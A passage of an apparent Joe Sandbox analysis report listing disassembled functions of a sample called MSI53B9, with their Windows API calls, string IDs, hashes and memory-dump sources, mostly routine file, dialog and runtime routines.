                                              • Opcode ID: 63d3cc6739577bfd1c8e70ddb7535700860eaf3187c3ce65de90d68282d7d40f
                                              • Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
                                              • Opcode Fuzzy Hash: 63d3cc6739577bfd1c8e70ddb7535700860eaf3187c3ce65de90d68282d7d40f
                                              • Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0088C738
                                                • Part of subcall function 0088CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088CB39
                                                • Part of subcall function 0088CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088CB4A
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: b58edcd091dea218955ae15810bbff83073f8b4b51151952a20fa6d4b6e3417f
                                              • Instruction ID: 436b7988e164a7ec813bcd55de263cc2a5b515a7e2646b94d6b765e64bec88bc
                                              • Opcode Fuzzy Hash: b58edcd091dea218955ae15810bbff83073f8b4b51151952a20fa6d4b6e3417f
                                              • Instruction Fuzzy Hash: 10A011E22A800BBC3008B2A82C02C3B0A0CF0C2B28330880EF802C0288A8A808000A32
                                              APIs
                                              • SetEndOfFile.KERNELBASE(?,00878EDB,?,?,-00001954), ref: 00879B6D
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: File
                                              • String ID:
                                              • API String ID: 749574446-0
                                              • Opcode ID: 52df872926cc86d9ce85bf40e6ad937cee1a83ea9970f6692316d7b1f36f7e4a
                                              • Instruction ID: f521cf5c77402baa3b6b8c9770714fda0e584112cbf776dce5c2994af4d47d67
                                              • Opcode Fuzzy Hash: 52df872926cc86d9ce85bf40e6ad937cee1a83ea9970f6692316d7b1f36f7e4a
                                              • Instruction Fuzzy Hash: A5B011300E080A8A8E002B30CC088203A20EA2230A30082A0A00AC80A0CB23C002AA00
                                              APIs
                                                • Part of subcall function 008712E7: GetDlgItem.USER32(00000000,00003021), ref: 0087132B
                                                • Part of subcall function 008712E7: SetWindowTextW.USER32(00000000,008A02E4), ref: 00871341
                                              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0088A5C8
                                              • EndDialog.USER32(?,00000006), ref: 0088A5DB
                                              • GetDlgItem.USER32(?,0000006C), ref: 0088A5F7
                                              • SetFocus.USER32(00000000), ref: 0088A5FE
                                              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0088A63E
                                              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0088A671
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0088A687
                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088A6A5
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088A6B5
                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088A6D2
                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088A6F0
                                                • Part of subcall function 0087D142: LoadStringW.USER32(?,?,00000200,?), ref: 0087D187
                                                • Part of subcall function 0087D142: LoadStringW.USER32(?,?,00000200,?), ref: 0087D19D
                                              • _swprintf.LIBCMT ref: 0088A720
                                                • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0088A733
                                              • FindClose.KERNEL32(00000000), ref: 0088A736
                                              • _swprintf.LIBCMT ref: 0088A791
                                              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0088A7A4
                                              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0088A7BA
                                              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0088A7DA
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088A7EA
                                              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088A804
                                              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088A81C
                                              • _swprintf.LIBCMT ref: 0088A84D
                                              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0088A860
                                              • _swprintf.LIBCMT ref: 0088A8B0
                                              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0088A8C3
                                                • Part of subcall function 0088932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00889355
                                                • Part of subcall function 0088932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008AA154,?,?), ref: 008893A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                              • API String ID: 3227067027-1840816070
                                              • Opcode ID: 34c4c64ec3783ff7d9757ab25dc479b7946760a571ff41a8624453ccb593369a
                                              • Instruction ID: 4fbee63d22c6f6c453deb900bb87961b7278c7fd3fe11d65f1ad4e3fa5e38800
                                              • Opcode Fuzzy Hash: 34c4c64ec3783ff7d9757ab25dc479b7946760a571ff41a8624453ccb593369a
                                              • Instruction Fuzzy Hash: A8919172648308BBE621EBA4CC49FFB77ACFB4A704F044819F649D2581D775AA058B63
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00877075
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008771D5
                                              • CloseHandle.KERNEL32(00000000), ref: 008771E5
                                                • Part of subcall function 00877A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAC
                                                • Part of subcall function 00877A9D: GetLastError.KERNEL32 ref: 00877AF2
                                                • Part of subcall function 00877A9D: CloseHandle.KERNEL32(?), ref: 00877B01
                                              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 008771F0
                                              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 008772FE
                                              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0087732A
                                              • CloseHandle.KERNEL32(?), ref: 0087733C
                                              • GetLastError.KERNEL32(00000015,00000000,?), ref: 0087734C
                                              • RemoveDirectoryW.KERNEL32(?), ref: 00877398
                                              • DeleteFileW.KERNEL32(?), ref: 008773C0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                              • API String ID: 3935142422-3508440684
                                              • Opcode ID: 5d64751835bee5886166e1bdc9bd5f47128ea700792c48a3db68028d9a116859
                                              • Instruction ID: fa2ebe81dd2047baa2ab24ccaefbbacc3483fb3e552427a0478baecc214c1801
                                              • Opcode Fuzzy Hash: 5d64751835bee5886166e1bdc9bd5f47128ea700792c48a3db68028d9a116859
                                              • Instruction Fuzzy Hash: 53B1BF719042189BEF20EF68CC45BEE77A8FF09304F548569F919E7246D730EA45CB62
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prolog_memcmp
                                              • String ID: CMT$h%u$hc%u
                                              • API String ID: 3004599000-3282847064
                                              • Opcode ID: 92cce9c2fb72f8375ecfef96413aece4edcd31d51e4d936cc0a7828dde588900
                                              • Instruction ID: 5ec32abf3472af3ced660e34b7bc1e881620433819e44102e569d94feecc1f8d
                                              • Opcode Fuzzy Hash: 92cce9c2fb72f8375ecfef96413aece4edcd31d51e4d936cc0a7828dde588900
                                              • Instruction Fuzzy Hash: 423281715142849BDB14DF68C886AE93BA5FF15304F04847DFD8ECB28ADB70DA48CB62
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: __floor_pentium4
                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                              • API String ID: 4168288129-2761157908
                                              • Opcode ID: e77b6474d84e81d2e360a96e0b78e537baa1e2143d84556bdcea54de6ebfdc88
                                              • Instruction ID: 387ff932066e0697a6c324e9abb84b4f1d1ac066bf2d47edd8dc298121bf27d1
                                              • Opcode Fuzzy Hash: e77b6474d84e81d2e360a96e0b78e537baa1e2143d84556bdcea54de6ebfdc88
                                              • Instruction Fuzzy Hash: D6C21871E046288FDF29EE68DD407A9B7B5FB84305F1941AAD44EE7240E774AE818F81
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 00872775
                                              • _strlen.LIBCMT ref: 00872CFF
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00872E56
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                              • String ID: CMT
                                              • API String ID: 3741668355-2756464174
                                              • Opcode ID: c3ccd0fa96e7b5e9ab61dde8df548b477d6ba1aae4b70b8c4ec6fe039cbdebcc
                                              • Instruction ID: c073e6238f50eca233a3c9e36f3f34402bc2b21e56e29dfa618f5ce8c4af28ab
                                              • Opcode Fuzzy Hash: c3ccd0fa96e7b5e9ab61dde8df548b477d6ba1aae4b70b8c4ec6fe039cbdebcc
                                              • Instruction Fuzzy Hash: 0B62BF715002848EDB29DF68C8856EA3BE1FF54304F08857EEC9ECB28ADB71D945CB61
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00895C4B
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00895C55
                                              • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00895C62
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 73537e58d5f23b48e11f6c0d0dcce5affc9f2588a320f0870ee736954f769ea2
                                              • Instruction ID: 42c404d2bb9a4e6448cd3fb13050b9ddd1ad56a41c2d4af707ca62fc1352ee22
                                              • Opcode Fuzzy Hash: 73537e58d5f23b48e11f6c0d0dcce5affc9f2588a320f0870ee736954f769ea2
                                              • Instruction Fuzzy Hash: 2A319375901328ABCB21EF68D989BDDBBB8FF18710F5041DAE41CA7290E7709B858F45
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .
                                              • API String ID: 0-248832578
                                              • Opcode ID: 972c803d848d7161451502695bd6aa4bfca3d572638be9488650000ab102a40e
                                              • Instruction ID: 1ad819338e937324e8d51c6c7c0f7b3d2e51f65c5e06ef7d7f23b5152383eba6
                                              • Opcode Fuzzy Hash: 972c803d848d7161451502695bd6aa4bfca3d572638be9488650000ab102a40e
                                              • Instruction Fuzzy Hash: 7A31D0B19142496FDF24AE78CC84EFA7BBDFF86714F0801A8E519D7251E6309E458B50
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                              • Instruction ID: e899d455b301ae6bf441024110f5efb286fc4e1b46166772e35783c822168383
                                              • Opcode Fuzzy Hash: adb73a532f26a33538fd5fb2ed24ee19948087a43571b45bda065bffbee46b1a
                                              • Instruction Fuzzy Hash: 01021D71E002199FDF18DFA9C8806ADB7F5FF88314F29826AD919E7344D731A9418B91
                                              APIs
                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00889355
                                              • GetNumberFormatW.KERNEL32(00000400,00000000,?,008AA154,?,?), ref: 008893A4
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: FormatInfoLocaleNumber
                                              • String ID:
                                              • API String ID: 2169056816-0
                                              • Opcode ID: 6977f12d58b56f0940369ccbd65f63099f55d0b594b676b76df615edfe4d2474
                                              • Instruction ID: ee93326b31bbb5d83bba39c77c94f7b168c99376b31c97741d56121d1131c9ae
                                              • Opcode Fuzzy Hash: 6977f12d58b56f0940369ccbd65f63099f55d0b594b676b76df615edfe4d2474
                                              • Instruction Fuzzy Hash: B0015E35640349BAEB109FA4DC05FAB77BCFF0A710F005526BA09D7661E3709919CBA6
                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0089E8CF,?,?,00000008,?,?,0089E56F,00000000), ref: 0089EB01
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: ceca701ba6179dc90ca2bbdc18708281048f352c1bcf5c93060e8115ce6c7367
                                              • Instruction ID: bd8bd508f1986c3d09a91241290ddcff658b425d5cb71a6cf263cba0a86dfad9
                                              • Opcode Fuzzy Hash: ceca701ba6179dc90ca2bbdc18708281048f352c1bcf5c93060e8115ce6c7367
                                              • Instruction Fuzzy Hash: 16B11931610608DFDB19DF28C48AB657FE1FF45365F298658E89ACF2A1C335E991CB40
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: gj
                                              • API String ID: 0-4203073231
                                              • Opcode ID: dbfba00243cd5d614b703de5629ca6ed83393c917429bf6d00552786a583f3bb
                                              • Instruction ID: 01e19cbd18f420770c46a4af1eab7a08020bb0b96f2635cb5efd0c9a0dfda133
                                              • Opcode Fuzzy Hash: dbfba00243cd5d614b703de5629ca6ed83393c917429bf6d00552786a583f3bb
                                              • Instruction Fuzzy Hash: 2DF1D1B2A083418FD748CF29D880A1AFBE1BFC9308F19892EF498D7711D634E9458F56
                                              APIs
                                              • GetVersionExW.KERNEL32(?), ref: 0087A905
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: Version
                                              • String ID:
                                              • API String ID: 1889659487-0
                                              • Opcode ID: 46acf45148cce9996171aa1e30c39c64a39a01a349a67e6d2d8959757f58455f
                                              • Instruction ID: 2f01d5393c58e36ebcf60eb8833b7a9a8aaa4af074704f1397cc8fe00a81f47b
                                              • Opcode Fuzzy Hash: 46acf45148cce9996171aa1e30c39c64a39a01a349a67e6d2d8959757f58455f
                                              • Instruction Fuzzy Hash: ECF062B49002088BDB2CCF14DC426E977B5F786720F104294DA6993750D3B1DD81CEA2
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001DBCF,0088D604), ref: 0088DBC8
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 3a9de65f75986e13ff02e05fb512bcc1ae563caf5eaa476a82a21981c8e5c0f1
                                              • Instruction ID: 63ea88730acb7f30963c6f9eb0d36c1e8906c1561581d5dc16951e6cba59bb0c
                                              • Opcode Fuzzy Hash: 3a9de65f75986e13ff02e05fb512bcc1ae563caf5eaa476a82a21981c8e5c0f1
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID: HeapProcess
                                              • String ID:
                                              • API String ID: 54951025-0
                                              • Opcode ID: 2df5d52c6f5284a35248f54de021de5caff1254c31310861d858bc00037597ed
                                              • Instruction ID: 50cfe7fa832865893bbfda87ec95ba0f3c1bc3fd7879d95d0422f2603d9ac128
                                              • Opcode Fuzzy Hash: 2df5d52c6f5284a35248f54de021de5caff1254c31310861d858bc00037597ed
                                              • Instruction Fuzzy Hash: E5A02230A02200CFB3008F32AF0B30C3AF8BA033C0B00802CA008C3330EB308000AF00
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                              • Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                              • Instruction ID: 678166ee2d57d339be61fd2da8ac7fb7bd79c3e49585c3d5690b7467472ce676
                                              • Opcode Fuzzy Hash: f76edbdb3f4a612c21f71557bb68a806c2ac5dff8f8e7f0331655fa6002ea0a3
                                              • Instruction Fuzzy Hash: 5162E671604B899FCB29EF38C8906B9BBE1FF55304F04896ED99ACB346D634E945CB10
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
